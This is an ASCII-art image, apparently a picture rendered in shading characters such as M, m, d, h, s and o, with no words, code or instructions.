MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs.:hdhyyyyyyyyyyyyyhhhhhdddddddddddddmdddddddddddddddddddddddddddddddhso++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooooossssssssssssooooooooooo++++++++++++++++++++++++++++++++++//////////+++/+++++++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssydmNNmmmmmmdddddddhddddddddddddmmmmddddddddddddddddddmmNNNNNmddddddddmmmmmmddddddhy+-.yMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMy.:+yyhhyyyyyhhhhhhhdddddddddddmmmmddddddddddddddddddddddddddddddhdddddoo+++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooosssssssssssssssssooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssyhmNNNmmmddddddddddddddddmmmmmmmmmmmmmmmmmmmmmdddddddddddmmNNNNmdddddddmmmmmmddhhys:-/mNMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhs.:syyyyyyyhhhhdddddddddmmmddhyso++////////+++osyhddddddddddddddddddddmy+++++++++++++++++++++++++++++++++++++++++++++++oooooooooooooossssssssssssssssssssoooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ooo+++++++ooooooooooooooooooooooooooooooossoooooooooossssssssssosssssssossssssssossssssssssssssssssssssssssssssshmNNNmmmdddddddddddmmmmmmmmddhyyssssssyyhddmmmmmmmmmdmdmddddmmNNNmdddddmddddddhhy+.`/NMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh++sssyyyhhhdddddddddmdhyo+//+osyyyyyyyyyso//++/++oyhdddddddddddddddddmhs++++++++++++++++++++++++++++++++++++++++++ooooooooooooooooosssssssssssssssssssssssssssoooooooooooooo+++++++++oooo++ooooo++++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooossssoossoooossssssssssssssssssoossssssssooooosssssssossssossssssssssssydNNNmmmmddddddddddmmmmmdhso+//+++ooooooo++/+ooshddmmmmmdmmmddddmmNNmddddddddddhy/-./mMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm.syhhhhhhdddddddmdhy+//osyhhhhhhhhyyso:.```.../yso+oyhddddddddhdddddmmdyo+++++++++++++++++++++++++++++++++++++oooooooooooooooooooossssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooo+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssooosssssssssssooossssoosoooooooooooosssssssssoooooooossssssssymNNNmmmdddddddddmmmmmds+::/+oyysyhdhhdddhhhyso++++oyddmddddmmdddddmNmdddddddddy+yhmMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNoshhhhdddddddmdds//+sssosshmNNNNNNmh+.```.``.:syhyyo+ohddddddddddddddmmdyo+++++++++++++++++++++++++++++++++++ooooooooooooooooossssssssssssssssssyyssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssooossssssssssoooooooooooooooooooooooosssooooooooooooossososymNNNmmmddddddddmmmmdy+:/++/---:/ymNNNNNNdo/-....-+++ooshddmmdddddddmmmdddddhhhy-:NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmdhhhdddddddmmds/+s+-...--:ymNNNNNmmh+-..-../osyysyhhysooydddddddddddddmmmhs++++++++++++++++++++++++++++++++++oooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooooooosssssoooosooooooooooooossssssssssssssssssssssssssssoosssssssssssooooooooooooooooooooooooooooooooooooooooooooymNNmmmdddddddddmdmds/:oyo:..--.-/hmNNNNNNNy:` `...../yysoohdddmdddddddmddhhhyys--hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhhhddhhddddmdy++ys/-....--:sdNmmmdhhs:/++/:+syydmmNNmhyysoohddddddddddddmmmds+++++++++++++++++++++++++++++o+ooooooooooooooooossssssssssssssssssssssyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssossoosssssssssssoossoooooossssssssssssoooooosssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooosdNNmmmddddddddmmmmy//syyyso+:.--`.:syyhdmmmo.```...:osyyyysoshddddmddddmdhhhyyys--MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhhhhddddddmmdyoshhss+:-::..--/ydmhyss+/oosooyysymmNNNNmdssyo+sdhddddddddddmmmhs++++++++++++++++++++++++++++ooooooooooooooooooooossssssssssssssssssssssssyyyysyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssosssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooohNNmmmmddddddddmmdo:oyhysyyyss:-/:``:osydmdo.``.:../syyyooyyyoohmdddddddddhhyyyss-`oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMyhyhdddddmdmdyoyyyhhyys+:///-..-+ydhhy/ossooyysyhhhdmNNNNmhyys+oddddddddddddmmmdyo+++++++++++++++++++++++++++ooooooooooooooooooooosssssssssssssssssyyssssyyyyyyyyyyyyyyyyyyyyyyyyyyysssssyyyyyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssooooossoooooooooooooooooooooooooooooooooooooooooooooooooooooooymNNmmmddddddddmmh//syhmmmmdssyy+:oo:.:shddo.`-/o:-+yyhmmh+oyyysoyddddmmdddhyyyyyys. hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmyhddhddddmdhsyyyyyhdhhyyo//+o:..-+o+:/sysosyysyhyyhdmmNmh+:+ss+odhddddddddddmmNmhso++++++++++++oo+++++++oooooooooooooooooooooooooosssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooohNNmmmdddddddmmmh/+soymNNNmmhosyyo/oso:/oo/-:/os::ossyssdmdhdhyysohddddmmddhhhyyysy/ hMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNhhhdddddmmmdyyyyoymNNNmhssso/+ss+-..../+oosyysoddhhhhhyso/-..-+s+sdddddddddddmmNNNdso++++++++++o++++++++++ooooooooooooooooooooooooosssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosdNNmmddddddmmmmh++sosmNNmhyhdhoosys+oso:.-.-+so/+ssoys::+hmhsosyyoshddddmdddhyhhyys/ dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhhdddddmmdysyysymNmmmmddyssyo+oo+//:/+ossss+:-/+++:-.````....-+oohdhddddddddmmNNNNmy+++++++++++++++++++ooooooooooooooooooooooosssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyhhhhhhyyyyhhhhhhhhyhhhhhhyhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooosdNmmdddddddmmmmy+ssshmNmhyyssyh++yys+oo/..-/osssysss+::::+dh+/+ssssyddddmmmdhhhhhysoodMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhhhhdddddmmdyyyyohmyyshdmmmhooyyssssoossssssso/.``````..--://////ooydddddddddddmmNNNNh+++++++++++ooooooooooooooooooooooooossssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosdmmddddddddmmmdsos/-/shhyyyysss:-:++osssooossssso//oooo+/+s+-.-:ossydddddmmddhhhhyssNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNyhhddddddddhysysoyyssshdmmdds/ossssss+//+osssso::///////:://++oosssydhhdddddddmmmNNNNy+++++++++ooooooooooooooooooooossssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhyyhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssoooooooooossssssoooooooooooooooooooooooooooooooosdmmdddddddddmmhss/.`.-----:://-..-+sssssooosossso---::----------:+sshddddmmdddhhhys/MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhhhddddddddysss/-:+ooooo++/:.`:+sssso/..--/ossssss+++osssyyyhhhhyssyddhddddddddmmNNNms++++++++ooo+++ooooooooooooosssssssssssssssssssssyssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyysyyssssssssssssssssssssssssssssssssssssssssssssoooooooooooooooooooooooooooooosdmmddddddddmmdhs+-`....-:/-......:ossso+//:/ossso-....-.--------:/oshdddddddddhhys/-MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdhhdddddddddyss+.````````````..-/sssooo///+osssssyyyyyyyhhhyyhyysssoyddhdddddddmmmNNNdo++++++++++++ooooooooooooooooossssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyysssssssssssssssssssssssssssssssssssssssssssssssssssooooossoosssoooooossdmmddddddddddmyso//////+oo+////+ossssso+/:////osssso/////////+++/+oshddddmmmddhys::/MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMyhhdddddddddhso/..``...-:::///+osssso/+o+//+sssssssoshdhhdmmNNmdysooyddhddddddddmmNNmy++++++++ooooooooooooooossssssssssyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssyysssyssssssssssssssssssssssssydmddddddddddmmhsssssssossssssssyyyyssso+++/--/ossyyyyysssssssssssssshddddmmmdhyyhhhNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdyhdddddddddhoo+++++/:::://oosyyysssssooo+ossso+/:-/ymmmddmNNNmmo+ssydhhdddddddmmmNNdssoooooooooooooossssyyyyyyhhhhhhhhddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmddddddhhhhyyyhhhhhhhhhhhhhyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhdddddddddddddddddddddddddddhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyssssyyyyysyyyyyyyyyyydmdddddddddddmhsyyhhhhysssyhhhhys+ossssooo+ossssoossysssyhhhhhyyoooshddddmmmdhyhMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMohhdddddddddhs/-:/+++ossyyyyyhhys+/osossssssso/-...:+sdmmmNmNNmy:+sshdhhddddmmmmmNmmmdhhyyyssssssyyyhhhddddmmmmmmmmmmmmNNmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmmddddddddddddddddddddddddddhhhhhhhhhhhdddhhhddhhddddddddddmmddmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddddddddddddddddddddhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyhhhhyyyyyyyyyyyhmmmddddddddddddyso+shmhyyyhdmmdo/-://osyyysso+::-/ssoooosdmhso+///+shdddmmmmmddMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMosyhdddddddddh+--oyyyhyyyhhdddhyo/:---:+sssso+++/:-.--:oydmmmdh//sosdhhhddmmmmmmmmNmmmmNmmmddddhhdddmmmmmmmmmmmmmmmmmmmmmmmmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddddddmddddddddddmmmmmmmmmmmmmmmmmNmNNNNNNNNNNNNNNNNNNNNNmNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddhhhhhhhhhhhhhdddhhhhhhhhhhhdmmmddddddddddddh+/:smNddddhmNmh:```.-:+sssso/-..`-+syddmmmmy+....-oyhhddmmmmdNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdooydddddddddds:../osyyyyhdmmmdy+-.`-::/osssyyss+/++/-..-/ooo+/:/+ohhhhdddmmmmmmmNNNNmNNMNNNNNNmmmmNmmNmmddmmNNNmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmddddddddddmmmmmmmmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmmmmmmdmddmddmNNNNNNNNMNNMMMMMMMMMMMMmmmmmmmNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmmmmmdddmmmmdddddddddmmddmddddmddddmddmNNmmddddddmddddds/-:ymmNNmmmds-```--:osssssos+::-`.:ymmNNmdo-````:shhddmmmmdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhsshdddddddddhs:...-+hdhhhhhddh+:::++osyhhdhhyyso+/+o/-.`...``--+ydhhddddmmmmmmNNNNNMMMMMMMMMMMMMMMMMMMm-.mMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm-...........--------osoooooooohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhmmmmmmmmmmmmmmmmmmmmmmmmmmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMsshNNmNNmdddddddmmddddho..:sdmmNmy/.``-/:-oyyhdhhyss+/o/-.:shmmho- `-oyhhddmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMysyddddddddddhs:-..-+hdmdhhhh+:+osoosyyhmmhhddysys//oso/-.```-/yhhhdddmmmmmmmNMMMNMMMMMMMMMMMMMMMMMMMMMddMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNddddsssss:::-.... `` ........................./MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNoNMMdNmmdddddddmdddddh+-.-oyo+/-..-oo/:oyyyhdmNhsyyo+ss+::oo+/.` `:oyhhdddmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmshyddddddddddhy+:---:oydddho/ossyssyyohmmmmmmdyssys++oss/.`-+yhhhddddmmmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNmdddddddddddddddddddddddddddddddddddddddddddhsssss/:-.. `--------------- `.-:osyMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMMMNNNmddddddmmddddddho-..-...:+oss++ssydhddmmd+syyssyyso:-.` `./shhhddddmdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNo+ydddddddddddhs+:---:/+/::+ssyyyyysohmmmmddddhsosys+/:..:syhhhdddmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNddddysyNNNNNNNNNNNNNNNssyddmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmddddddddddddddy/-...:ossy++ysohmmmNmmmy/syyyyyys+.```.:oyhhhddmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhdMMMMMd/dmdddddddddddhys+:----.-/osyyyyyyo/yddmmmddhs::///:..:oyyhhhddmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmmddmmddddddddddhs/--:ossysyy+ymNNNNmmdo/+syhyso+/``.:oyhhhddddmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmyyhdm/hMMMMMMMMNmmddmmdddddhhhhs+/::--:osysyyyyo:/shyyso/:.`````-/oyhyhhddddmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmmddmmmddddddddddhs+/:-:ooo/:+yyyyyss+---/+o+:...-/syhhdddddmmmNMMMMMMMhs+hyymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN..+ydNNMMMMMMMMMMMNmmdmmmmmdddhhhhyso+:::/::oo+:--.--..``````.-/oyyyyhhddddmmmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmmmmmmmmmmdddddddhys+/::----:----..........-:+syhhhhdddmmmmNNMMMMMMMMMdhd:-ohosMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMhdMMMMMMMMMMMMMMMMMNNmmmmmmmmdddhhhhhhyso+//:--........--::+osyyyyhhhdddmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmmdddddddddhhyso+////:::::::://+osyyhhhhddddmmmmNNMMMMMMMMMMMMMMMNmhy+MMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmdddddhhhhhhhyyyssoooosssyyyyyyyyhhhddddmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmmmdddddddhhhhhhyyyyyyyyyyhhhhhhddddddmmmmNNMMMMMMMMMMMMMMMMMMMMdysNMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::dNMMMMMMMMMMMMMMMMMMMMMNNNmmmmmmmmmdddddhhhhhhhhhhyyyyyyyhhhhdddddmmmmmmmmNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmmmmmmmmmmmmdddddddddhhhhhhhhhhhddddddmmmmmmmNMMMMMMMMMMMMMMMMMMMMMNhy:`dMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmosmMMMmymdNMMMMMMMMMMMMMMMMMNNmmmmmmmmmmmmdddddddddddddddddddmmmmmmmmmmmmNNMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNmmmmmmmmmmmmddddddddddddddddmmmmmmmmNNMMMMMMMMMMMMMMMMMMMMMMMM/ -:oNMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMs-::oMMMMMMMMMMMMMMMMMMMMNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmNNNMMMMMMMMMMMMMMMMMMMMMNNMMMMMMdyhdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmyNMmdNMMMMMMMNNNNNNmmmmmmmmmmmmmmmmmmmmmmmNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMNNNNNNNNNNNNNNNNNNNNNNMMMMMMMMMMMMMMdydNNMMdhhds/-:MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhMMo`/sddy+++oNMMMMNNyyhdmmmmdddddmmmNNNNNMMMMMNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNmNNNNNNmmmNNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmhdmMMMMMy+++sMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMm.o/:+NMh-:yyyymMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
